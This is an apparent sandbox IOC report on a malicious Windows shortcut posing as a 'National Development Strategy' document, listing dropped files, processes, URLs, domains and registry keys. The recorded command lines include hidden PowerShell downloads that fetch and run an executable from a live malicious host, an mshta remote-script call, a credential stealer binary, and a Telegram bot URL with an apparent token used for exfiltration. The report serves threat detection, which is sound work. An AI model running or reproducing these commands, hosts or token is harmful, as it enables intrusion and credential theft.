IOC Report
National Development Strategy.lnk

loading gif

Files

File Path
Type
Category
Malicious
National Development Strategy.lnk
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has command line arguments, Icon number=0, Archive, ctime=Sat Dec 7 08:09:39 2019, mtime=Thu Dec 22 03:43:01 2022, atime=Sat Dec 7 08:09:39 2019, length=14848, window=hide
initial sample
 malicious
C:\ProgramData\lsacs.exe
PE32+ executable (GUI) x86-64, for MS Windows
dropped
 malicious
C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\Cryptodome\Cipher\_Salsa20.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
 malicious
C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\Cryptodome\Cipher\_raw_aes.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
 malicious
C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\Cryptodome\Cipher\_raw_aesni.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
 malicious
C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\Cryptodome\Cipher\_raw_cbc.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
 malicious
C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\Cryptodome\Cipher\_raw_cfb.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
 malicious
C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\Cryptodome\Cipher\_raw_ctr.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
 malicious
C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\Cryptodome\Cipher\_raw_ecb.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
 malicious
C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\Cryptodome\Cipher\_raw_eksblowfish.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
 malicious
C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\Cryptodome\Cipher\_raw_ocb.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
 malicious
C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\Cryptodome\Cipher\_raw_ofb.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
 malicious
C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\Cryptodome\Hash\_BLAKE2s.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
 malicious
C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\Cryptodome\Hash\_MD5.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
 malicious
C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\Cryptodome\Hash\_SHA1.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
 malicious
C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\Cryptodome\Hash\_SHA256.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
 malicious
C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\Cryptodome\Hash\_ghash_clmul.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
 malicious
C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\Cryptodome\Hash\_ghash_portable.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
 malicious
C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\Cryptodome\Protocol\_scrypt.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
 malicious
C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\Cryptodome\Util\_cpuid_c.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
 malicious
C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\Cryptodome\Util\_strxor.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
 malicious
C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\_bz2.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
 malicious
C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\_ctypes.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
 malicious
C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\_decimal.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
 malicious
C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\_elementtree.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
 malicious
C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\_hashlib.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
 malicious
C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\_lzma.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
 malicious
C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\_queue.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
 malicious
C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\_socket.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
 malicious
C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\_sqlite3.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
 malicious
C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\_ssl.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
 malicious
C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\_uuid.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
 malicious
C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\pyexpat.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
 malicious
C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\python39.dll
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
 malicious
C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\pythoncom39.dll
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
 malicious
C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\pywintypes39.dll
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
 malicious
C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\select.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
 malicious
C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\sqlite3.dll
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
 malicious
C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\steal.exe
PE32+ executable (GUI) x86-64, for MS Windows
dropped
 malicious
C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\unicodedata.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
 malicious
C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\win32crypt.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
 malicious
C:\ProgramData\file.pdf
PDF document, version 1.7, 1 pages
dropped
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\05349744be1ad4ad_0
data
dropped
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\0786087c3c360803_0
data
dropped
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\0998db3a32ab3f41_0
data
dropped
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\0ace9ee3d914a5c0_0
data
dropped
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\0f25049d69125b1e_0
data
dropped
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\230e5fe3e6f82b2c_0
data
dropped
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\2798067b152b83c7_0
data
dropped
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\2a426f11fd8ebe18_0
data
dropped
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\39c14c1f4b086971_0
data
dropped
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\3a4ae3940784292a_0
data
dropped
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\4a0e94571d979b3c_0
data
dropped
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\560e9c8bff5008d8_0
data
dropped
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\56c4cd218555ae2b_0
data
dropped
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\6267ed4d4a13f54b_0
data
dropped
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\6fb6d030c4ebbc21_0
data
dropped
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\7120c35b509b0fae_0
data
modified
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\71febec55d5c75cd_0
data
dropped
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\86b8040b7132b608_0
data
dropped
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\8c159cc5880890bc_0
data
dropped
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\8c84d92a9dbce3e0_0
data
dropped
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\8e417e79df3bf0e9_0
data
dropped
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\91cec06bb2836fa5_0
data
dropped
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\927a1596c37ebe5e_0
data
dropped
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\92c56fa2a6c4d5ba_0
data
dropped
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\946896ee27df7947_0
data
dropped
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\983b7a3da8f39a46_0
data
dropped
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\aba6710fde0876af_0
data
dropped
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\b6d5deb4812ac6e9_0
data
dropped
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\bba29d2e6197e2f4_0
data
dropped
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\bf0ac66ae1eb4a7f_0
data
dropped
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\cf3e34002cde7e9c_0
data
dropped
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\d449e58cb15daaf1_0
data
dropped
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\d88192ac53852604_0
data
dropped
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\de789e80edd740d6_0
data
dropped
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\f0cf6dfa8a1afa3d_0
data
dropped
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\f4a0d4ca2f3b95da_0
data
dropped
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\f941376b2efdd6e6_0
data
dropped
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\f971b7eda7fa05c3_0
data
dropped
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\fd17b2d8331c91e8_0
data
dropped
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\fdd733564de6fbcb_0
data
dropped
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\febb41df4ea2b63a_0
data
dropped
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\index-dir\temp-index
data
dropped
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\index-dir\the-real-index (copy)
data
dropped
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\index-dir\the-real-index~RF67bdbd.TMP (copy)
data
dropped
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG
ASCII text
dropped
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG.old (copy)
ASCII text
dropped
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG.old~RF671596.TMP (copy)
ASCII text
dropped
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Visited Links
data
dropped
C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ConnectorIcons\icon-230131015135Z-242.bmp
PC bitmap, Windows 3.x format, 107 x -152 x 32, cbSize 65110, bits offset 54
dropped
C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages
SQLite 3.x database, last written using SQLite version 3024000, file counter 12, database pages 15, cookie 0x5, schema 4, UTF-8, version-valid-for 12
dropped
C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages-journal
SQLite Rollback Journal
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\189397[1].png
PNG image data, 512 x 512, 8-bit/color RGBA, non-interlaced
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\s[1].hta
HTML document, ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_a3vxi3je.uda.ps1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cjchyufc.z4k.psm1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dapxgbjs.b5j.ps1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jvlelz22.etj.psm1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pbjyotax.xfw.psm1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_slrsabnf.e3p.ps1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\certifi\cacert.pem
ASCII text
dropped
C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\libcrypto-1_1.dll
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\libffi-7.dll
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\libssl-1_1.dll
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\vcruntime140.dll
PE32+ executable (DLL) (console) x86-64, for MS Windows
dropped
C:\Users\user\Desktop\Loginvault.db
SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 2, database pages 23, cookie 0x19, schema 4, UTF-8, version-valid-for 2
dropped
There are 99 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Windows\System32\mshta.exe
"C:\Windows\System32\mshta.exe" https://cloud.archive-downloader.com/s.hta
 malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden -command Invoke-WebRequest -URI https://cloud.archive-downloader.com/file.pdf -OutFile 'c:\programdata\file.pdf'; c:\programdata\file.pdf
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden -command Invoke-WebRequest -URI https://cloud.archive-downloader.com/lsacs.exe -OutFile 'c:\programdata\lsacs.exe'; c:\programdata\lsacs.exe
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command Remove-Item C:\Users\user\Downloads\Presidents_Strategy_2023.rar
 malicious
C:\ProgramData\lsacs.exe
C:\programdata\lsacs.exe
 malicious
C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\steal.exe
C:\programdata\lsacs.exe
 malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\programdata\file.pdf
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
There are 1 hidden processes, click here to show them.

URLs

Name
IP
Malicious
https://cloud.archive-downloader.com/P
unknown
 malicious
https://cloud.archive-downloader.com/L
unknown
 malicious
https://cloud.archive-downloader.com/lsacs.exe
193.149.129.50
 malicious
http://cloud.archive-downloader.com
unknown
 malicious
https://cloud.archive-downloader.com/s.htaATH=
unknown
 malicious
https://cloud.archive-downloader.com/s.hta...6
unknown
 malicious
https://cloud.archive-downloader.comx
unknown
 malicious
https://cloud.archive-downloader.com/s.htaLMEMX8U
unknown
 malicious
https://cloud.archive-downloader.com/s.htaNNC:
unknown
 malicious
https://cloud.archive-downloader.com/s.htaowsINetCookies
unknown
 malicious
https://cloud.archive-downloader.com/s.htaC:
unknown
 malicious
https://cloud.archive-downloader.com/s.hta...
unknown
 malicious
https://cloud.archive-downloader.com
unknown
 malicious
https://cloud.archive-downloader.com/s.hta=
unknown
 malicious
https://cloud.archive-downloader.com/s.hta
193.149.129.50
 malicious
https://cloud.archive-downloader.com/file.pdf0y
unknown
 malicious
https://cloud.archive-downloader.com/lsacs.exeG
unknown
 malicious
https://cloud.archive-downloader.com/s.hta)
unknown
 malicious
https://cloud.archive-downloader.com/lsacs.exe0y
unknown
 malicious
https://cloud.archive-downloader.com/
unknown
 malicious
https://cloud.archive-downloader.com/lsacs.exe-OutFile
unknown
 malicious
https://cloud.archive-downloader.com/file.pdf
193.149.129.50
 malicious
https://cloud.archive-downloader.com/s.htaQ
unknown
 malicious
https://cloud.archive-downloader.com/file.pdf-OutFile
unknown
 malicious
http://google.com/
unknown
https://mahler:8092/site-updates.py
unknown
http://tools.ietf.org/html/rfc5869
unknown
https://cdn1.iconfinder.com/data/icons/google_jfk_icons_by_carlosjj/512/chrome.pngl
unknown
https://cloud.google.com/appengine/docs/standard/runtimes
unknown
http://blog.cryptographyengineering.com/2012/05/how-to-choose-authenticated-encryption.html
unknown
http://www.python.org/
unknown
https://github.com/mhammond/pywin32
unknown
https://httpbin.org/post
unknown
https://contoso.com/License
unknown
https://cdn1.iconfinder.com/data/icons/google_jfk_icons_by_carlosjj/512/chrome.pngr
unknown
https://github.com/Ousret/charset_normalizer
unknown
https://api.telegram.org/bot5885840251:AAG8HoCjrI1QANXkA4oqnJ60lgPP7w86Clg/sendMessage?chat_id=56833
unknown
https://tools.ietf.org/html/rfc2388#section-4.4
unknown
http://yahoo.com/
unknown
http://www.iana.org/assignments/tls-parameters/tls-parameters.xml#tls-parameters-6
unknown
https://www.ibm.com/
unknown
https://contoso.com/
unknown
https://nuget.org/nuget.exe
unknown
https://cdn1.iconfinder.com/data/icons/google_jfk_icons_by_carlosjj/512/chrome.pngC:
unknown
http://www.iana.org/time-zones/repository/tz-link.html
unknown
http://tools.ietf.org/html/rfc5297
unknown
https://urllib3.readthedocs.io/en/1.26.x/advanced-usage.html#ssl-warningsp
unknown
https://requests.readthedocs.io
unknown
https://tools.ietf.org/html/rfc3610
unknown
http://speleotrove.com/decimal/decarith.html
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
https://cdn1.iconfinder.com/;
unknown
http://json.org
unknown
https://cdn1.iconfinder.com/data/icons/google_jfk_icons_by_carlosjj/512/chrome.png
172.64.193.26
http://www.cs.ucdavis.edu/~rogaway/papers/keywrap.pdf
unknown
https://httpbin.org/get
unknown
http://nuget.org/NuGet.exe
unknown
http://httpbin.org/
unknown
https://www.python.org
unknown
http://pesterbdd.com/images/Pester.png
unknown
https://cdn1.iconfinder.com/I
unknown
http://www.tarsnap.com/scrypt/scrypt-slides.pdf
unknown
http://www.apache.org/licenses/LICENSE-2.0.html
unknown
http://csrc.nist.gov/publications/nistpubs/800-38a/sp800-38a.pdf
unknown
https://go.micro
unknown
https://contoso.com/Icon
unknown
https://urllib3.readthedocs.io/en/1.26.x/advanced-usage.html#ssl-warnings
unknown
https://httpbin.org/
unknown
http://www.cl.cam.ac.uk/~mgk25/iso-time.html
unknown
https://twitter.com/
unknown
https://github.com/Pester/Pester
unknown
http://hg.python.org/cpython/file/603b4d593758/Lib/socket.py#l535
unknown
https://www.ibm.com/support/knowledgecenter/en/ssw_aix_61/com.ibm.aix.basetrf1/load.htm
unknown
http://crl.m
unknown
http://google.com/mail/
unknown
http://wwwsearch.sf.net/):
unknown
https://tools.ietf.org/html/rfc5297
unknown
https://www.ietf.org/rfc/rfc2898.txt
unknown
http://web.cs.ucdavis.edu/~rogaway/ocb/license.htm
unknown
https://packaging.python.org/specifications/entry-points/
unknown
https://cdn1.iconfinder.com/y
unknown
http://www.phys.uu.nl/~vgent/calendar/isocalendar.htm
unknown
http://www.rfc-editor.org/info/rfc7253
unknown
https://cdn1.iconfinder.com/
unknown
http://csrc.nist.gov/publications/nistpubs/800-38C/SP800-38C.pdf
unknown
http://google.com/mail
unknown
http://csrc.nist.gov/publications/nistpubs/800-38D/SP-800-38D.pdf
unknown
There are 77 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
cloud.archive-downloader.com
193.149.129.50
 malicious
cdn1.iconfinder.com
172.64.193.26

IPs

IP
Domain
Country
Malicious
193.149.129.50
cloud.archive-downloader.com
Denmark
malicious
192.168.2.1
unknown
unknown
172.64.193.26
cdn1.iconfinder.com
United States

Registry

Path
Value
Malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
LangID
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe.FriendlyAppName
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe.ApplicationCompany
HKEY_CURRENT_USER\Software\Adobe\Acrobat Reader\DC\AVGeneral\cRecentFiles\c1
aFS
HKEY_CURRENT_USER\Software\Adobe\Acrobat Reader\DC\AVGeneral\cRecentFiles\c1
tDIText
HKEY_CURRENT_USER\Software\Adobe\Acrobat Reader\DC\AVGeneral\cRecentFiles\c1
tFileName
HKEY_CURRENT_USER\Software\Adobe\Acrobat Reader\DC\AVGeneral\cRecentFiles\c1
tFileSource
HKEY_CURRENT_USER\Software\Adobe\Acrobat Reader\DC\AVGeneral\cRecentFiles\c1
sFileAncestors
HKEY_CURRENT_USER\Software\Adobe\Acrobat Reader\DC\AVGeneral\cRecentFiles\c1
sDI
HKEY_CURRENT_USER\Software\Adobe\Acrobat Reader\DC\AVGeneral\cRecentFiles\c1
sDate
HKEY_CURRENT_USER\Software\Adobe\Acrobat Reader\DC\AVGeneral\cRecentFiles\c1
uFileSize
HKEY_CURRENT_USER\Software\Adobe\Acrobat Reader\DC\AVGeneral\cRecentFiles\c1
uPageCount
HKEY_CURRENT_USER\Software\Adobe\Acrobat Reader\DC\AVGeneral\cRecentFiles\c2
aFS
HKEY_CURRENT_USER\Software\Adobe\Acrobat Reader\DC\AVGeneral\cRecentFiles\c2
tDIText
HKEY_CURRENT_USER\Software\Adobe\Acrobat Reader\DC\AVGeneral\cRecentFiles\c2
tFileName
HKEY_CURRENT_USER\Software\Adobe\Acrobat Reader\DC\AVGeneral\cRecentFiles\c2
sFileAncestors
HKEY_CURRENT_USER\Software\Adobe\Acrobat Reader\DC\AVGeneral\cRecentFiles\c2
sDI
HKEY_CURRENT_USER\Software\Adobe\Acrobat Reader\DC\AVGeneral\cRecentFiles\c2
sDate
There are 22 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
7FFC0FF25000
unkown
page read and write
7FFC11EE2000
unkown
page readonly
7FFC12915000
unkown
page read and write
20561760000
heap
page read and write
216AF878000
trusted library allocation
page read and write
24AAE0A8000
heap
page read and write
8FDE6FB000
stack
page read and write
77E3ABE000
stack
page read and write
20561DD2000
heap
page read and write
24AAE856000
heap
page read and write
205615F0000
heap
page read and write
28F304D0000
heap
page read and write
28F306E2000
heap
page read and write
242AB8AE000
heap
page read and write
21CB9810000
trusted library allocation
page read and write
24AAE9BB000
heap
page read and write
22658202000
heap
page read and write
216AE731000
trusted library allocation
page read and write
7FFBABBA2000
trusted library allocation
page read and write
24AAE9E9000
heap
page read and write
205617E9000
heap
page read and write
7FFC21E11000
unkown
page execute read
216AF2AE000
trusted library allocation
page read and write
20561B70000
direct allocation
page read and write
24AAE794000
heap
page read and write
7FFC12F35000
unkown
page readonly
24AAE06D000
heap
page read and write
21CA3249000
trusted library allocation
page read and write
216C683F000
heap
page read and write
2B1B7C66000
heap
page read and write
2DF6D2CB000
heap
page read and write
24AAE9CB000
heap
page read and write
21CA2004000
trusted library allocation
page read and write
7FFC11F2E000
unkown
page readonly
24AAE030000
heap
page read and write
7FFBABCD0000
trusted library allocation
page read and write
24AAE20A000
heap
page read and write
24AAE063000
heap
page read and write
300B37F000
stack
page read and write
2055F982000
heap
page read and write
24AAE951000
heap
page read and write
216AC7E2000
heap
page read and write
7FFC12E80000
unkown
page readonly
24AAE08C000
heap
page read and write
D9308CD000
stack
page read and write
2B1B7C69000
heap
page read and write
F202AFF000
stack
page read and write
BEF1DFE000
stack
page read and write
7FFC12F76000
unkown
page readonly
7FFC12F6D000
unkown
page readonly
205621B0000
direct allocation
page read and write
216AF2C3000
trusted library allocation
page read and write
D930C0C000
stack
page read and write
24AAE0A8000
heap
page read and write
7FFBABB71000
trusted library allocation
page read and write
21CB9800000
trusted library allocation
page read and write
300B77E000
stack
page read and write
7FFBAB9C4000
trusted library allocation
page read and write
24AAE76D000
heap
page read and write
7FFC1EC80000
unkown
page readonly
24AAE21F000
heap
page read and write
7FFC12EA5000
unkown
page read and write
2B1B7C7A000
heap
page read and write
24AAE7DB000
heap
page read and write
216AF8C3000
trusted library allocation
page read and write
